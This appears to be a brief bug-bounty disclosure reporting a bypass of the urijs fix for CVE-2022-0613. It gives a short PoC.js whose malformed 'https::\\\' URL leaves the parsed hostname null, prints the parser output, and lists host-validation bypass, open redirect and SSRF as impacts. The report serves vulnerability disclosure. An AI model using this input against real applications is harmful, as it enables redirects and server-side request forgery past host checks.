bypass https://huntr.dev/bounties/f53d5c42-c108-40b8-917d-9dad51535083/
urijs fix CVE-2022-0613 , however attacker can bypass to exploit this issue
// PoC.js
var URI = require('urijs');
var url = new URI("https::\\\github.com/foo/bar");
console.log(url);
output:
URI {
_string: '',
_parts: {
protocol: 'https',
username: null,
password: null,
hostname: null,
urn: null,
port: null,
path: '/github.com/foo/bar',
query: null,
fragment: null,
preventInvalidHostname: false,
duplicateQueryParameters: false,
escapeQuerySpace: true
},
_deferred_build: true
}
Bypass host-validation checks, open redirect, SSRF etc. - depends on the usage of urijs